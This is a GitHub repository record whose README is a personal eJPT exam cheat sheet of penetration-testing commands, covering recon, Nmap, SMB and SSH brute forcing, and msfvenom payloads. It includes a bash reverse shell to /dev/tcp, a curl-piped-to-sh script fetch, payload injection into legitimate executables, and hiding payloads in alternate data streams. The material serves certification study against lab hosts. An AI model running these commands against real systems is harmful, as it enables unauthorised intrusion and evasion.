{"id":24852065,"url":"https://github.com/radeelahmad/ejpt-cheatsheet","last_synced_at":"2026-01-30T10:03:50.294Z","repository":{"id":274610640,"uuid":"922875968","full_name":"RadeelAhmad/eJPT-CheatSheet","owner":"RadeelAhmad","description":"This repo has all the notes that I took during my preparation for the eJPT exam.","archived":false,"fork":false,"pushed_at":"2025-12-24T11:28:04.000Z","size":1274,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-12-26T01:49:09.357Z","etag":null,"topics":["ejpt","ejpt-cheatsheet","ejpt-notes"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RadeelAhmad.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-01-27T08:45:40.000Z","updated_at":"2025-12-25T20:01:50.000Z","dependencies_parsed_at":"2025-01-28T11:25:36.531Z","dependency_job_id":"6ada52a3-bbd0-462d-8f09-ae843776df9d","html_url":"https://github.com/RadeelAhmad/eJPT-CheatSheet","commit_stats":null,"previous_names":["radeelahmad/ejpt-cheatsheet"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RadeelAhmad/eJPT-CheatSheet","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadeelAhmad%2FeJPT-CheatSheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadeelAhmad%2FeJPT-CheatSheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadeelAhmad%2FeJPT-CheatSheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadeelAhmad%2FeJPT-CheatSheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RadeelAhmad","download_url":"https://codeload.github.com/RadeelAhmad/eJPT-CheatSheet/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadeelAhmad%2FeJPT-CheatSheet/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28910965,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-30T08:15:08.179Z","status":"ssl_error","status_checked_at":"2026-01-30T08:14:31.507Z","response_time":66,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ejpt","ejpt-cheatsheet","ejpt-notes"],"created_at":"2025-01-31T14:38:51.851Z","updated_at":"2026-01-30T10:03:50.282Z","avatar_url":"https://github.com/RadeelAhmad.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":" # eJPT-CheatSheet\n\n\u003e **Note**\n\u003e These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this 'cheatsheet'.\n\nInfo about eJPT certification [here](https://security.ine.com/certifications/ejpt-certification/).  \n\n## Table Of Contents\n- [Find IP address of a website](#Find-IP-address-of-a-website)\n- [WAF w00f command](#WAF-w00f-command)\n- [Sublist3r](#Sublist3r)\n- [Google Dorking](#Google-Dorking)\n- [theHarvester](#theHarvester)\n- [Host Discovery using Nmap](#Host-Discovery-using-Nmap)\n- [Curl](#Curl)\n- [Nmap scans \u0026 scripts](#Nmap-scans)\n- [Payload of msfconsole \u0026 msfvenom](#Payload)\n- [Setup of autopwn](#Setup-of-autopwn)\n- [TCP Commands](#TCP-Commands)\n- [Ping Sweep](#Ping-Sweep)\n- [SMB Commands \u0026 enum4linux](#SMB-Commands)\n- [FTP Commands](#FTP-Commands)\n- [SSH Commands](#SSH-Commands)\n- [HTTP Commands](#HTTP-Commands)\n- [MYSQL Commands](#MYSQL-Commands)\n- [Exploiting Microsoft IIA WebDAV](#Exploiting-Microsoft-IIA-WebDAV)\n- [SMB Exploitation](#SMB-Exploitation)\n- [Exploiting MS17-010 \u0026 autoblue](#Exploiting-MS17-010)\n- [RDP Exploitation](#RDP-Exploitation)\n- [Exploit Blue Keep](#Exploit-Blue-Keep)\n- [Explpoit Bad Blue](#Exploit-Bad-Blue)\n- [Exploiting WinRM](#Exploiting-WinRM)\n- [Windows Kernel Exploits](#Windows-Kernel-Exploits)\n- [Bypassing UAC with UACMe](#Bypassing-UAC-with-UACMe)\n- [Access Token Impersonation](#Access-Token-Impersonation)\n- [hide payload in window](#hide-payload-in-window)\n- [Searching for Passwords In Windows Configuration Files](#Searching-for-Passwords-In-Windows-Configuration-Files)\n- [Dumping hashes with Mimikatz](#Dumping-hashes-with-Mimikatz)\n- [Pass-The-Hash](#Pass-The-Hash)\n- [Shell Shock (linus exploitation \u0026 .cgi)](#Shell-Shock)\n- [WMAP](#WMAP)\n- [SAMBA Commands](#SAMBA-Commands)\n- [Linux Kernel Exploits](#Linux-Kernel-Exploits)\n- [Cron Jobs](#Cron-Jobs)\n- [Exploiting SUID Binaries](#Exploiting-SUID-Binaries)\n- [Dumping Linux Passwords Hashes](#Dumping-Linux-Passwords-Hashes)\n- [SMB \u0026 NetBIOS Enumeration](#SMB-\u0026-NetBIOS-Enumeration)\n- [SNMP Enumeration](#SNMP-Enumeration)\n- [SMB Relay Attack](#SMB-Relay-Attack)\n- [Importing Nmap Scan Results Into MSF](#Importing-Nmap-Scan-Results-Into-MSF)\n- [Network Service Scanning](#Network-Service-Scanning)\n- [FTP Enumeration](#FTP-Enumeration)\n- [SMB Enumeration](#SMB-Enumeration)\n- [Web Server Enumeration](#Web-Server-Enumeration)\n- [MySQL Enumeration](#MySQL-Enumeration)\n- [SSH Enumeration](#SSH-Enumeration)\n- [SMTP Enumeration](#SMTP-Enumeration)\n- [WMAP MSF Plugin commands](#WMAP-MSF-Plugin-commands)\n- [Exploiting WinRM-02](#Exploiting-WinRM-02)\n- [Exploitation of Tomcat](#Exploitation-of-Tomcat)\n- [VSFTPD Exploitation](#VSFTPD-Exploitation)\n- [SAMBA Exploitation](#SAMBA-Exploitation)\n- [SSH Exploitation](#SSH-Exploitation)\n- [SMTP Server Exploitation](#SMTP-Server-Exploitation)\n- [Meterpreter Commands](#Meterpreter-Commands)\n- [Windows Post Exploitation Module](#Windows-Post-Exploitation-Module)\n- [Bypassing UAC Through Memory Injection](#Bypassing-UAC-Through-Memory-Injection)\n- [Establishing Persistence on Windows](#Establishing-Persistence-on-Windows)\n- [Enabling RDP](#Enabling-RDP)\n- [Windows Keylogging](#Windows-Keylogging)\n- [Clearing Windows Logs](#Clearing-Windows-Logs)\n- [Pivoting](#Pivoting)\n- [Linux Post Exploitation Modules](#Linux-Post-Exploitation-Modules)\n- [FUN STUFF](#FUN-STUFF)\n- [Linux Privilege Escalation: Exploiting a vulnerable program (chkrootkkit)](#Linux-Privilege-Escalation-Exploiting-a-vulnerable-program-chkrootkkit)\n- [Linux Password Hash (exploit-ProFTPD)](#Linux-Password-Hash-exploit-ProFTPD)\n- [*Linux Privilege Escalation](#Linux-Privilege-Escalation)\n- [Establishing Persistence On Linux](#Establishing-Persistence-On-Linux)\n- [Exploiting Misconfigured Cron Jobs \u0026 exploit copy.sh](#Exploiting-Misconfigured-Cron-Jobs--exploit-copysh)\n- [Exploiting SUID Binaries](#Exploiting-SUID-Binaries)\n- [Exploit HTPP file server rejetto](#Exploit-HTPP-file-server-rejetto)\n- [GUI metasploit](#GUI-metasploit)\n- [Netcat \u0026 blind shell](#Netcat--blind-shell)\n- [Exploit PHP](#Exploit-PHP)\n\n# eJPT Cheat Sheet\n\nbloodhound\n```shell\nbloodhound-python -dc-ip 10.10.11.174 -d support.htb -u 'support' -p 'Ironside47pleasure40Watchful' -c all\n```\n\n nc\n```shell\nnc -lvnp 9001\nimport os; os.system(\"bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cmy-ip\u003e/9001 0\u003e\u00261'\")\n```\n \ncrackstation\n```url\nhttps://crackstation.net/\n```\n\n\n```url\nhttps://www.exploit-db.com/\nhttps://www.rapid7.com/db/\n```\n\u003e This URL is use to search exploit publicly\n\n- Also use `searchsploit` for offline search of exploit\n\n```shell\n# Local network\nsudo python3 -m http.server 80 #Host\ncurl 10.10.10.10/linpeas.sh | sh #Victim\n```\n\n```shell\ndirsearch -u linkvortex.htb -t 50 -i 200\n```\n\n```shell\ndirsearch -u underpass.htb/daloradius/app -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \n```\n\n```shell\ngit-dumper http://10.13.37.14/.git/ dump_new\n```\n\n```shell\nfuf -u http://linkvortex.htb/ -w ./fuzzDicts/subdomainDicts/main.txt -H \"Host:FUZZ.linkvortex.htb\"  -mc 200\nffuf -w /home/naahl/Desktop/subdomain.txt -u http://titanic.htb/ -H  \"Host:FUZZ.titanic.htb\" -fc 301\nferoxbuster -u http://nocturnal.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt\nffuf -w /home/naahl/Desktop/xato-net-10-million-usernames-dup.txt -u 'http://nocturnal.htb/view.php?username=FUZZ\u0026file=bad.odt' -fw 1167\nffuf -c -w /home/naahl/Desktop/wordlist.txt -u \"http://10.13.37.11/backups/backup_2025042015FUZZ.zip\" -mc 200 -fc 40\n```\n\nlist of internal service running\n```shell\nnetstat -tulpn\n```\n\nport forwarding\n```shell\nssh -L 8888:127.0.0.1:8080 tobias@nocturnal.htb\n```\n```shell\nfind / -writable -type d 2\u003e/dev/null\n```\n\u003e find all writable directories on the box\n\n```shell\nln -s /root/root.txt root.txt\n```\n\u003e create a symlink\n\n#### Find IP address of a website:\n\n\n```shell\nservice postgresql start\n```\n\n```shell\nls -al /usr/nmap/scripts/ | grep -e \"snmp\"\n```\n\u003e search a specific script \n\n```shell\nhost \u003curl\u003e\n```\n\n\u003e If you see two addresses or ip addresses than that means the website is behind some kind of proxy or firewall like the cloud flare.\n\n#### WhatWeb\n\n```shell\nwhatweb \u003curl\u003e\n```\n\n#### Whois recon:\n\n```shell\nwhois \u003curl\u003e\n```\n\n\u003e The `whois` command retrieves registration details about a domain name, such as the owner, contact information, and the domain's creation and expiration dates.\n\n#### DNS Recon\n\n```shell\ndnsrecon -d \u003cdomain\u003e\n```\n\n\u003e DNS Dumpster can be used to perform the same function.\n\n#### WAF w00f command:\n\n```shell\nwafw00f \u003curl\u003e -a\n```\n\n\u003e Will tell whether the web application is protected by a firewall or not. And if its is protected by the firewall than what solution is being used.\n\n#### Sublist3r\n\n```shell\nsublist3r -d \u003cdomain\u003e\n```\n\n\u003e Looks for subdomains on different search engines.\n\n#### Google Dorking:\n\n```shell\nsite:\u003cdomain\u003e\n```\n\n\u003e This limits all the searches to a particular domain only. Will also show some subdomains of the particular domain used.\n\n```shell\nsite:\u003cdomain\u003e inurl:\u003ckeyword\u003e \nsite:ine.com inurl:admin\n```\n\n\u003e This can be used to search a particular key word within the domain URL.\n\n```shell\nsite:*.\u003cdomain\u003e\n```\n\n\u003e This would not show the domain it self but its subdomains.\n\n```shell\nsite:*.\u003cdomain\u003e intitle:\u003ckeyword\u003e\n```\n\n\u003e This will search subdomains with a particular key word in its tittle.\n\n```shell\nsite:*.\u003cdomain\u003e filetype:\u003ctype\u003e\nsite:*.ine.com filetype:PDF\n```\n\n\u003e Searches for PDFs (particular file type) in subdomains.\n\n```shell\nintitle:index of \n```\n\n\u003e This basically tracks the directory listing vulnerability.\n\n```shell\ncache:\u003cdomain\u003e\n```\n\n\u003e This basically shows the older version of the website.\n\n```shell\ninurl:auth_user_file.txt\n```\n\n\u003e This would enlist all the website with the same `.txt` file. Such files can be used for storing user authentication passwords.\n\n```shell\ninurl:wp-config.bak\n```\n\n\u003e Can be used to find WordPress Backup Config Files. Can contain passwords for MySQL servers.\n\n#### theHarvester:\n\n```shell\ntheharvester -d \u003cdomain\u003e -b google,yahoo,\u003cany-other\u003e\n```\n\n\u003e Looks for emails and names on a particular website.\n\n#### Zoon Transfer:\n\n```shell\ndnsenum \u003cdomain\u003e\n```\n\n\u003e dnsenum can be used to perform a DNS Brute-force as well.\n\n```shell\ndig axfr @\u003cname-server\u003e \u003cdomain\u003e\ndig axfr @nsztm1.digi.ninja zonetransfer.me\n```\n\n\u003e `axfr` is the switch for zone transfer.\n\n```shell\nfierce -dns \u003cdomain\u003e\n```\n\n\u003e It can also be used for performing a DNS Brute-force.\n\n#### Host Discovery using Nmap:\n\n```Shell\nsudo nmap -sn \u003cip-address\u003e/\u003csub-net-if-any\u003e\n```\n\n\u003e Pings all the IPs with in the sub-net and shows only ones that ping back.\n\n```Shell\nsudo netdiscover -i \u003cinterface\u003e -r \u003cip-address\u003e/\u003csub-net-if-any\u003e\nsudo netdicover -i eth0 -r 192.168.3.0/24\n```\n\n\u003e `-i` is used for the interface and `-r` is used for the ip-address range. It uses ARP to scan the hots.\n\n#### Curl\n```shell\ncurl -I http://target.ine.local\n```\n\u003e Analyze the response for server details or unusual information.\n\n#### Nmap scans:\n\n`nmap`...Then remember:\n- `-sS`: SYN scan (Stealth scan, faster than TCP connect)\n- `-sT`: TCP connect scan (Standard TCP scan)\n- `-sU`: UDP scan (Scan for open UDP ports)\n- `-sA`: ACK scan (Checks firewall rules filtered or not) \n- `-sP` or `-sn`: Ping scan (Find online hosts)\n- `-sV`: Version detection (Identify services/version info)\n- `-sC`: Default script scan (Runs default NSE scripts)\n- `-O`: OS detection (Guess the operating system)\n- `-p`: Port selection (Scan specific ports)\n- `-F`: Fast scan (Scans fewer ports for speed)\n- `-f` Fragmentation \n- `-A`: Aggressive scan (OS detection, version detection, script scanning, and traceroute)\n- `-D` Decoy.\n- `-T\u003c0-5\u003e`: Timing template (Adjusts scan speed, from `0` (paranoid) to `5` (insane))\n    - `T0`: Paranoid timing, performing scans extremely slowly to avoid detection.\n    - `T1`: Sneaky timing, still slow but less extreme than T0.\n    - `T2`: Polite timing, useful for avoiding overwhelming a network.\n    - `T3`: Default timing, balanced between speed and stealth.\n    - `T4`: Aggressive timing, faster but more likely to trigger alarms.\n    - `T5`: Insane timing, very fast and noisy.\n- `-oN`: Output in normal format (Saves scan output to a file)\n- `-oX`: Output in XML format (Saves scan output in XML format)\n- `-oG`: Greppable output (Saves scan output in a grep-friendly format and machine-readable format)\n- `-oA`: Output in all formats (`-oN`, `-oX`, `-oG` combined)\n- `-v`: Verbose mode (Displays more information during the scan)\n- `-n`: No DNS resolution (Skips DNS resolution)\n- `-6`: IPv6 scanning (Scan using IPv6 addresses)\n- `-R`: Always resolve DNS (Resolves domain names, even if not needed)\n- `-Pn`: No ping (Skips host discovery, assumes hosts are up)\n- `-PS` SYN ping.\n- `-iL`: Input from a file (Scans hosts listed in a file)\n- `-oX -`: Output to stdout in XML format (Useful for piping into other tools)\n- `--host-timeout \u003ctime\u003e`: Host is skipped if it doesn't responds in the set time periord.\n- `--script`: Run specific NSE scripts (For customized scans)\n- `--traceroute`: Perform a traceroute (Maps the route to the host)\n- `--reason`: Display the reason for each host/port state\n- `--osscan-guess`: OS Version probability.\n\nExample:\n```bash\nnmap -sS -p 1-100,443 192.168.1.13,14\n```\n\nTip: Use `--reason` to show the explanation of why a port is marked open or closed  \nTip: Use `--open` to show only open, open filtered, and unfiltered ports.\n\n```console\nnmap -T4 -sS -sV --version-intensity 8 \u003cip-address\u003e\n```\n\n\u003e In Nmap, the `--version-intensity` option controls the intensity of version detection scanning. It takes a value from 0 to 9, where:\n   **0**: Lightest intensity, meaning Nmap will try very few probes to determine the service version.\n   **9**: The highest intensity, meaning Nmap will use the most comprehensive set of probes to determine the service version.\n\n```bash\nnmap -sV -sC 192.168.1.1\n```\n\n\u003eTCP Quick Scan\n\n```bash\nnmap -sV -sC -p- 192.168.1.1\n```\n\n\u003e TCP Full Scan\n\n```bash\nnmap -sV -sU 192.168.1.1\n```\n\n\u003e UDP Quick Scan\n\n```bash\nnmap -sC -p 27017 192.168.1.13 | less\n```\n\n\u003e Get info on a particular service:\n\nNMAP Scripts are all available `/usr/share/namp/scripts`.\n\n```Shell\nnmap --script=\u003cscript-name\u003e \u003cip-address\u003e\n```\n\n\u003e Basic command to run any script.\n\n```Shell\nnmap --script=\u003ckeyword-*\u003e \u003cip-address\u003e\nnmap --script=ftp-* 10.10.10.10\n```\n\n\u003e It is used to run all the scripts related to any keyword.\n\n```Shell\nnmap --mtu \u003csize\u003e \u003ctarget\u003e\nnmap --mtu 32 example.com\n```\n\n\u003e The `--mtu` flag allows you to set a custom Maximum Transmission Unit (MTU) for the packets that Nmap sends during scanning.\n\n```Shell\nnmap demo.ine.local -p 177 -A\n```\n\n\u003e We can perform an Nmap port scan on the target system to identify whether the BIND DNS server is open. \n\n```Shell\nnmap 10.0.24.0/20 --open\n```\n\n\u003e This command scans the subnet and shows only the open ports of the target.\n\n```Shell\nnmap -p 443 --script ssl-heartbleed \u003cip-address\u003e\n```\n\n\u003e This checks that whether the host machine is vulnerable to Heat Bleed Vulnerability or not.\n\n```Shell\nnmap --script log4shell.nse --script-args log4shell.callback-server=172.17.42.1:1389 -p 8080 \u003cip-address\u003e\n```\n\n\u003e Log4J Discovery script\n\n\n```shell\nnmap -sV --script=banner \u003ctarget-IP\u003e\n```\n\u003e This is use for banner grabbing\n\n#### Payload:\n\n```shell\nmsfvenom --list payloads\n```\n\u003e show the list of payloads\n\n```shell\nmsfvenom --list formats\n```\n\u003e this is use to show the formats of payload\n\n- Window payload\n  \n```shell\nmsfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=\u003cmy-ip\u003e LPORT=1234 -f exe \u003e payload.exe\n```\n\u003e msfvenom payload. `x86` for 32 bit and `x64` is for 64 bit\n\n- Linux payload\n\n```shell\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=\u003cmy-ip\u003e LPORT=1234 -f elf \u003e payload\nchmod +x payload\n```\n\n```shell\nsudo python -m SimpleHTTPServer 80\n```\n\u003e first open the directory which you have a payload and serve that directory in http server to download payload in target system. open target system browser `http://\u003cmy-ip\u003e:80`. \n\n```shell\nuse multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LHOST \u003cmy-ip\u003e\nset LPORT 1234\nrun\n```\n\u003e After deliver payload\n\n***payload encoding***\n```shell\nmsfvenom --list encoders\n```\n\u003e show the list of encoding\n\n```shell\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=\u003cmy-ip\u003e LPORT=1234 -e x86/shikata_ga_nai -f exe \u003e payload.exe\n```\n\u003e add `-i 10` before -e mean that we encode the payload 10 time mean 10 iteration\n\n***inject payload in executable file***\n```shell\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=\u003cmy-ip\u003e LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x \u003cpath of file that you want to inject\u003e.exe \u003e payload.exe\n```\n\u003e best if winRar `https://www.win-rar.com/predownload.html?\u0026L=0\u0026Version=32bit` to inject the payload in this\n\n#### hide payload in window\n```shell\ncd Desktop\nnotepad test.txt:secret.txt\n```\n\u003e in window cmd\n\n```shell\ncd Temp\ntype payload.exe \u003e windowing.txt:winpeas.exe\nstart windowing.txt:winpeas.exe\n```\n\u003e for payload hide. if we hide this in some file it show storage 0\n\n```shell\nmklink wupdate.exe C:\\Temp\\windowing.txt:winpeas.exe\nwupdate\n```\n\u003e if it not start direct then we this to create symbolic link and then start\n\n#### Setup of autopwn\n```shell\ncd Downloads\nwget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb\nsudo mv db_autopwn.rb /usr/sharemetasploit-framework/plugin/\n\u003con kali in msfconsole\u003e\nload db_autopwn\ndb_autopwn -p -t -PI 445\n```\n\u003e it give us all the exploit of that specific port\n\n#### TCP Commands:\n\n```Shell\nnetstat -antp        /linux\nnetstat -ano         /windows\n```\n\n\u003e Lists down all the current tcp connections.\n\n#### Ping Sweep:\n\n```shell\nping -b -c 4 \u003cbroadcast IP address\u003e\nfping -a -g \u003cIP address\u003e/24\n```\n\u003e Ping Sweep: A technique to identify active hosts in a network range by sending ICMP Echo Requests.\n\u003e ICMP Echo Requests: Type 8\n\u003e ICMP Echo Reply: Type 0\n\n#### SMB Commands:\n\n```Shell\nnmap -p445 --script smb-protocols demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-security-mode demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-sessions demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-shares demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-groups --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-groups --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-services --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```Shell\nnmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local\n```\n\n```CMD\nnet use Z: \\\\\u003cip-address\u003e\\C$ smbserver_771 /user:administrator\n```\n\n\u003e To mount the SMD user from the CMD.\n\n```Shell\nsmbmap -u administrator -p smbserver_771 -d . -H demo.ine.local\n```\n\n```Shell\nsmbmap -H demo.ine.local -u administrator -p smbserver_771 -x 'ipconfig'\n```\n\n```Shell\nsmbmap -H demo.ine.local -u Administrator -p 'smbserver_771' -L\n```\n\n```Shell\nsmbmap -H demo.ine.local -u Administrator -p 'smbserver_771' -r 'C$'\n```\n\n```Shell\nsmbmap -H demo.ine.local -u Administrator -p 'smbserver_771' --upload '/root/backdoor' 'C$\\backdoor'\n```\n\n```Shell\nsmbmap -H demo.ine.local -u Administrator -p 'smbserver_771' -r 'C$'\n```\n\n```Shell\nsmbmap -H demo.ine.local -u Administrator -p 'smbserver_771' --download 'C$\\flag.txt'\n```\n\n```msfconsole\n/auxiliary/scanner/smb/smb_version\n```\n\n\u003e This MSF Module can be used to scan the SAMBA or SMB version of a machine\n\n```msfconsole\n/auxiliary/scanner/smb/smb_version\n```\n\n\u003e This module is used to check whether it supports SMB2 or not.\n\n```msfconsole\n/auxiliary/scanner/smb/smb_enumshares\n```\n\n\u003e It can used to enumerate shares.\n\n```msfconsole\n/auxiliary/scanner/smb/pipe_auditor\n```\n\n\u003e This is used to enumerate name pipes or the communications pipes. \n\n```Shell\nnmblookup -A \u003cip-address\u003e\n```\n\n\u003e This can be used to look up SMB connections and Groups.\n\n```shell\nsmbclient -L \u003cip-address\u003e -N\n```\n\n\u003e Now SMB Client can be used to connect to those sessions and the `-N` Flag looks for the Null sessions.\n\n```Shell\nsmbclient //\u003c\u003eip-address\u003e/\u003cuser\u003e -N\n```\n\n\u003e This allows us to connect to a particular user without any password.\n\n```Shell\nrpcclient -U \"\" -N \u003cip-address\u003e\n```\n\n\u003e RPC Client is used to connect to a server and in this command it is connected with a null user and no password.\n\n`srvinfo`: This rpc command is used to find the server info.\n`enumdomusers`: This rpc commands is used to find users in the server.\n`lookupnames \u003ckeyword\u003e`: It is used to look for a specific username.\n`enumdomgroups`: It is used list down all the groups.\n\n```Shell\nenum4linux -o \u003cip-address\u003e\nenum4linux -U \u003cip-address\u003e\nenum4linux -U \u003cip-address\u003e\nenum4linux -G \u003cip-address\u003e\n```\n\n\u003e enum4linux in a Linux enum tool and in the above given command we are doing an operating system scan, second one is performing a user scan, the third one is looking for shares, and the last one lists all the user groups.\n\n```shell\nsmbclient -L \\\\\\\\\u003cIP\u003e\\\\ -U \u003cusername\u003e\n```\n\u003e show all the shares\n\n```shell\nsmbclient \\\\\\\\\u003cIP\u003e\\\\\u003cshare-name\u003e -U \u003cusername\u003e\n```\n\u003e enter into account of admin in that share\n\n```msfconsole\nuse /auciliary/scanner/smb/smb_login\nshow options\nset RHOST \u003cip-address\u003e\nset pass_file /usr/share/wordlists/metasploit/unix_passwords.txt\nset smb_user \u003cuser-name\u003e\nexploit\n```\n\n\u003e These set of commands from metasploit can be used to brute force a particular SMB user.\n\n```Shell\nhydra -l \u003cuser-name\u003e -P /usr/share/wordlists/rockyou.txt \u003cip-address\u003e smb\n```\n\n\u003e This hydra command is used brute force a particular SMB user.\n\n```shell\ncrackmapexec smb \u003cdc-ip\u003e -u \u003cuser\u003e -p \u003cpassword\u003e --rid-brute\nnetexec smb \u003cdc-ip\u003e -u \u003cuser\u003e -p \u003cpassword\u003e --users --rid-brute\n```\n\u003e for no cred enumeration use username as “guest” and password as blank\n\n```shell\nevil-winrm -i \u003cip\u003e -u \u003cuser\u003e -p '\u003cpass\u003e'\n```\n\u003e evil-winrm to login\n\n#### FTP Commands:\n\n```Shell\nhydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt \u003cip-address\u003e ftp\n```\n\n\u003e It is used to brute force users and their passwords on FTP.\n\n```console\nftp \u003cip-address\u003e\n```\n\n\u003e Can be used to login.\n\n```shell\nnmap \u003cip-address\u003e --script-args userdb=/root/users -p 21 \n```\n\n**Note:**\n\n`root/users` has the user(s) that I am sure are present in the system.\n\n\u003e Nmap can be also used to brute force user(s) password(s).\n\n#### SSH Commands:\n\n```Shell\n ssh \u003cuser-name\u003e@\u003cip-address\u003e \n```\n\n\u003e SSH Login\n\n```Shell\nnmap --script ssh2-enum-algos demo.ine.local\n```\n\n\u003e The script enumerates the supported key exchange, encryption, MAC, and compression algorithms for SSH-2 on the target host.\n\n```Shell\nnmap --script ssh-hostkey --script-args ssh hostkey=full demo.ine.local\n```\n\n\u003eThe script retrieves and displays the full SSH host keys and fingerprints of the target server for security auditing purposes.\n\n```Shell\nnmap -p 22 --script ssh-auth-methods --script-args=\"ssh.user=\u003cuser-name\u003e\" demo.ine.local\n```\n\n\u003e The script checks and lists the supported SSH authentication methods (e.g., password, public key) for the specified user on the target host.\n\n```Shell\nhydra -l \u003cuer-name\u003e -P /usr/share/wordlists/rockyou.txt\n```\n\n\u003e SSH Brute force using hydra on a specific user.\n\n```Shell\nnmap \u003cip-address\u003e -p 22 --script ssh-brute --script-args userdb=/root/user\n```\n\n**Note:**\n\n`root/users` has the user(s) that I am sure are present in the system.\n\n\u003e Nmap can be also used to brute force user(s) password(s).\n\n```msfconsole\nuse /auxiliary/scanner/ssh/ssh_login\nshow options\nset RHOST \u003cip-address\u003e\nset userpass_file /usr/share/wordlists/metasploit/root_userpass.txt\nset STOP ON SUCCESS true\nset verbose true\nexploit\n```\n\n\u003e These set of commands from metasploit can be used to brute force a particular SSH user.\n\n#### HTTP Commands:\n\n```Shell\nwhatweb \u003cip-address\u003e\n```\n\n\u003e Running what web tool to find all possible information about the target server.\n\n```Shell\nhttp \u003cip-address\u003e\n```\n\n\u003e We could also use the `httpie` tool to gather target server information.\n\n```Shell\ndirp http://\u003cip-address\u003e\n```\n\n\u003e Running the `dirb` tool on the target server port 80 to discover the web server’s directories and subdirectories.\n\n```Shell\nbrowsh --startup-url http://\u003cip-address\u003e/\u003csub-domain\u003e\n```\n\n\u003e This utility is useful when we don’t have a browser i.e. Firefox, Chrome, etc. to access the target application and we have to use the terminal to access the web application.\n\n```Shell\nnmap --script http-enum -sV -p 80 \u003cip-address\u003e\n```\n\n\u003e The command scans port 80 using Nmap to identify HTTP service versions and enumerate potential web directories and files.\n\n```Shell\nnmap --script http-headers -sV -p 80 \u003cip-address\u003e\n```\n\n\u003e The command scans port 80 using Nmap to detect service versions `-sV` and retrieve HTTP headers using the `http-headers` script\n\n```Shell\nnmap --script http-methods --script-args http-methods.url-path=/webdav/ \u003cip-address\u003e\n```\n\n\u003e The command uses Nmap to scan and check which HTTP methods are allowed on the `/webdav/` URL path by using the `http-methods` script with the specified script arguments.\n\n```Shell\nnmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/ demo.ine.local\n```\n\n\u003e The command uses Nmap to scan for WebDAV vulnerabilities by checking the `/webdav/` URL path using the `http-webdav-scan` script, with the path specified via script 